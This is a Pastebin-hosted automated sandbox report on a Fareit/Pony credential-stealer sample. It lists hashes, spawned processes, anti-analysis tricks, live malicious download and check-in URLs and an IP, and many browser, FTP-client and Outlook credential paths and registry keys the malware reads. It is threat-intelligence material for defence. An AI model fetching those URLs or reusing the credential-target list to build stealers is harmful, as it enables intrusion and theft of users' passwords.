Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [*] MalFamily: "Fareit"
- [*] MalScore: 10.0
- [*] File Name: "Exes_c16da8f082d2ee71cb9cff395c6e7ebf.exe"
- [*] File Size: 96256
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "55ede14b2dbad82dd5fcc13fd8ee5a5a8a419621f4958f88643e3f944144660e"
- [*] MD5: "c16da8f082d2ee71cb9cff395c6e7ebf"
- [*] SHA1: "1f6f829c4d5d866c87fe4e316694f8dfe0b4e07f"
- [*] SHA512: "90d98bd8fc4fbc22b94b88b5918d88f4e3556e4a4643b254f8283b5c31035a96bfcbb175c2b2fcca0064854af72989fcd25fc30a566931c92ab4544426e0199f"
- [*] CRC32: "79F0D773"
- [*] SSDEEP: "1536:lzAX/kLsqQxGoXhTSbwQInU0XdijI01e+dKxIkbTdFhDZqJyQgDOXSk:GkLQ7FIwQIZXdKDdCIkbnhDZq0QgDOXn"
- [*] Process Execution: [
- "Exes_c16da8f082d2ee71cb9cff395c6e7ebf.exe",
- "cmd.exe",
- "BN65EA.tmp",
- "BNB91.tmp",
- "services.exe",
- "taskhost.exe",
- "sc.exe",
- "svchost.exe",
- "WerFault.exe",
- "wermgr.exe",
- "svchost.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "At least one process apparently crashed during execution",
- "Details": []
- },
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "A process attempted to delay the analysis task.",
- "Details": [
- {
- "Process": "BNB91.tmp tried to sleep 1270 seconds, actually delayed analysis time by 0 seconds"
- },
- {
- "Process": "Exes_c16da8f082d2ee71cb9cff395c6e7ebf.exe tried to sleep 1500 seconds, actually delayed analysis time by 0 seconds"
- },
- {
- "Process": "BN65EA.tmp tried to sleep 1620 seconds, actually delayed analysis time by 0 seconds"
- }
- ]
- },
- {
- "Description": "Drops a binary and executes it",
- "Details": [
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\BNB91.tmp"
- },
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\BN65EA.tmp"
- }
- ]
- },
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- },
- {
- "http_version_old": "HTTP traffic uses version 1.0"
- },
- {
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- },
- {
- "suspicious_request": "http://andpartanthat.com/4/forum.php"
- },
- {
- "suspicious_request": "http://geysirland.com/wp-content/plugins//1"
- },
- {
- "suspicious_request": "http://andpartanthat.com/mlu/forum.php"
- },
- {
- "suspicious_request": "http://www.gruenbaum.com.br/wp-content/plugins/qtranslate/art2.exe"
- },
- {
- "suspicious_request": "http://31.44.184.33/H7mp"
- },
- {
- "suspicious_request": "http://31.44.184.33/ga.js"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://api.ipify.org/"
- },
- {
- "url": "http://andpartanthat.com/4/forum.php"
- },
- {
- "url": "http://geysirland.com/wp-content/plugins//1"
- },
- {
- "url": "http://andpartanthat.com/mlu/forum.php"
- },
- {
- "url": "http://www.gruenbaum.com.br/wp-content/plugins/qtranslate/art2.exe"
- },
- {
- "url": "http://31.44.184.33/H7mp"
- },
- {
- "url": "http://31.44.184.33/ga.js"
- }
- ]
- },
- {
- "Description": "Looks up the external IP address",
- "Details": [
- {
- "domain": "api.ipify.org"
- }
- ]
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 9306576 times"
- }
- ]
- },
- {
- "Description": "Steals private information from local Internet browsers",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- }
- ]
- },
- {
- "Description": "Network activity contains more than one unique useragent.",
- "Details": [
- {
- "Process": "Exes_c16da8f082d2ee71cb9cff395c6e7ebf.exe"
- },
- {
- "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
- },
- {
- "Process": "BN65EA.tmp"
- },
- {
- "User-Agent": ""
- },
- {
- "Process": "BN65EA.tmp"
- },
- {
- "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; NP07; NP07)"
- }
- ]
- },
- {
- "Description": "A process sent information about the computer to a remote location.",
- "Details": [
- {
- "Beacon": "Exes_c16da8f082d2ee71cb9cff395c6e7ebf.exe: GUID=13962712492586483736&BUILD=0207_349876&INFO=Host @ Host\\user&IP=0.0.0.0&TYPE=1&WIN=6.1(x64)"
- }
- ]
- },
- {
- "Description": "Collects information about installed applications",
- "Details": [
- {
- "Program": "Google Update Helper"
- },
- {
- "Program": "Microsoft Excel MUI 2013"
- },
- {
- "Program": "Microsoft Outlook MUI 2013"
- },
- {
- },
- {
- "Program": "Google Chrome"
- },
- {
- "Program": "Adobe Flash Player 29 NPAPI"
- },
- {
- "Program": "Adobe Flash Player 29 ActiveX"
- },
- {
- "Program": "Microsoft DCF MUI 2013"
- },
- {
- "Program": "Microsoft Access MUI 2013"
- },
- {
- "Program": "Microsoft Office Proofing Tools 2013 - English"
- },
- {
- "Program": "Adobe Acrobat Reader DC"
- },
- {
- "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
- },
- {
- "Program": "Microsoft Publisher MUI 2013"
- },
- {
- "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
- },
- {
- "Program": "Microsoft Office Shared MUI 2013"
- },
- {
- "Program": "Microsoft Office OSM MUI 2013"
- },
- {
- "Program": "Microsoft InfoPath MUI 2013"
- },
- {
- "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
- },
- {
- "Program": "Microsoft Word MUI 2013"
- },
- {
- "Program": "Microsoft Groove MUI 2013"
- },
- {
- },
- {
- "Program": "Microsoft Access Setup Metadata MUI 2013"
- },
- {
- "Program": "Microsoft Office OSM UX MUI 2013"
- },
- {
- "Program": "Microsoft PowerPoint MUI 2013"
- },
- {
- "Program": "Microsoft Office Professional Plus 2013"
- },
- {
- "Program": "Adobe Refresh Manager"
- },
- {
- "Program": "Microsoft Office Proofing 2013"
- },
- {
- "Program": "Microsoft Lync MUI 2013"
- },
- {
- },
- {
- "Program": "Microsoft OneNote MUI 2013"
- }
- ]
- },
- {
- "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "Cylance": "Unsafe"
- },
- {
- "APEX": "Malicious"
- },
- {
- "Avast": "FileRepMalware"
- },
- {
- "Kaspersky": "UDS:DangerousObject.Multi.Generic"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "Rising": "Trojan.Kryptik!8.8/N3#89% (RDM+:cmRtazqysGEjsoOpYpokdc5Y04Lc)"
- },
- {
- "Endgame": "malicious (high confidence)"
- },
- {
- "Invincea": "heuristic"
- },
- {
- "FireEye": "Generic.mg.c16da8f082d2ee71"
- },
- {
- "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
- },
- {
- "VBA32": "BScope.Trojan.Chanitor"
- },
- {
- "Webroot": "W32.Trojan.Gen"
- },
- {
- "AVG": "FileRepMalware"
- },
- {
- "Cybereason": "malicious.c4d5d8"
- },
- {
- "Qihoo-360": "HEUR/QVM20.1.424D.Malware.Gen"
- }
- ]
- },
- {
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details": []
- },
- {
- "Description": "Harvests credentials from local FTP client softwares",
- "Details": [
- {
- "file": "C:\\Program Files (x86)\\CuteFTP\\sm.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\CuteFTP\\sm.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\GlobalSCAPE\\CuteFTP\\sm.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\CuteFTP\\sm.dat"
- },
- {
- "file": "C:\\Program Files (x86)\\GlobalSCAPE\\CuteFTP\\sm.dat"
- },
- {
- "file": "C:\\ProgramData\\CuteFTP\\sm.dat"
- },
- {
- "file": "C:\\ProgramData\\GlobalSCAPE\\CuteFTP\\sm.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\GlobalSCAPE\\CuteFTP\\sm.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\FlashFXP\\4\\Sites.dat"
- },
- {
- "file": "C:\\ProgramData\\FlashFXP\\3\\Sites.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\FlashFXP\\3\\Sites.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\FlashFXP\\4\\Sites.dat"
- },
- {
- "file": "C:\\ProgramData\\FlashFXP\\4\\Sites.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\FlashFXP\\3\\Sites.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\FlashFXP\\3\\Quick.dat"
- },
- {
- "file": "C:\\ProgramData\\FlashFXP\\4\\Quick.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\FlashFXP\\4\\Quick.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\FlashFXP\\4\\Quick.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\FlashFXP\\3\\Quick.dat"
- },
- {
- "file": "C:\\ProgramData\\FlashFXP\\3\\Quick.dat"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\FileZilla\\sitemanager.xml"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
- },
- {
- "file": "C:\\ProgramData\\FileZilla\\sitemanager.xml"
- },
- {
- "file": "C:\\ProgramData\\FileZilla\\recentservers.xml"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\FileZilla\\recentservers.xml"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\VanDyke\\Config\\Sessions\\*.*"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\VanDyke\\Config\\Sessions\\*.*"
- },
- {
- "file": "C:\\ProgramData\\VanDyke\\Config\\Sessions\\*.*"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\SmartFTP\\*.*"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Local\\SmartFTP\\*.*"
- },
- {
- "file": "C:\\ProgramData\\SmartFTP\\*.*"
- },
- {
- "file": "C:\\Program Files (x86)\\Common Files\\Ipswitch\\WS_FTP\\*.*"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 9\\QCToolbar"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar"
- },
- {
- "key": "HKEY_LOCAL_MACHINE\\Software\\Ghisler\\Windows Commander"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Windows Commander"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
- },
- {
- "key": "HKEY_LOCAL_MACHINE\\Software\\Ghisler\\Total Commander"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\BPFTP\\Bullet Proof FTP\\Options"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\BPFTP\\Bullet Proof FTP\\Main"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\FileZilla"
- },
- {
- "key": "HKEY_LOCAL_MACHINE\\Software\\FileZilla"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\FileZilla Client"
- },
- {
- "key": "HKEY_LOCAL_MACHINE\\Software\\FileZilla Client"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\FTPWare\\COREFTP\\Sites"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\BulletProof Software\\BulletProof FTP Client\\Main"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\BulletProof Software\\BulletProof FTP Client\\Options"
- }
- ]
- },
- {
- "Description": "Harvests information related to installed mail clients",
- "Details": [
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Port"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Password"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\NNTP User Name"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Password2"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTPMail Server"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTP Password"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Port"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTPMail Password2"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTP Server URL"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP User"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\NNTP Password2"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTPMail Password2"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTP Password"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Server"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Email Address"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Server"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP Port"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP Port"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP User"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Password2"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\NNTP Password"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP Password"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Port"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Password"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTPMail User Name"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Server"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\NNTP Email Address"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\NNTP User Name"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP User Name"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\NNTP Password"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP User Name"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP User"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 User"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTP User"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 User Name"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\NNTP Server"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP Password"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP User"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTPMail Server"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP Server"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Password2"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP Password2"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 User"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP Password2"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\NNTP Server"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Server"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\NNTP Email Address"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\NNTP Password2"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Password2"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Email Address"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP User Name"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 User Name"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTP Server URL"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Password"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTPMail User Name"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Port"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP User Name"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Password"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP Server"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTP User"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts"
- },
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Account Manager\\Accounts"
- },
- {
- "key": "HKEY_CURRENT_USER\\Identities\\{0A258175-2D14-4D69-9955-E200F247250F}\\Software\\Microsoft\\Internet Account Manager\\Accounts"
- }
- ]
- },
- {
- "Description": "Created network traffic indicative of malicious activity",
- "Details": [
- {
- "signature": "ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile"
- },
- {
- "signature": "ET TROJAN Fareit/Pony Downloader Checkin 2"
- },
- {
- "signature": "ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious"
- },
- {
- "signature": "ET TROJAN Possible Metasploit Payload Common Construct Bind_API (from server)"
- }
- ]
- }
- ]
- [*] Started Service: [
- "VaultSvc",
- "WerSvc",
- "W32Time"
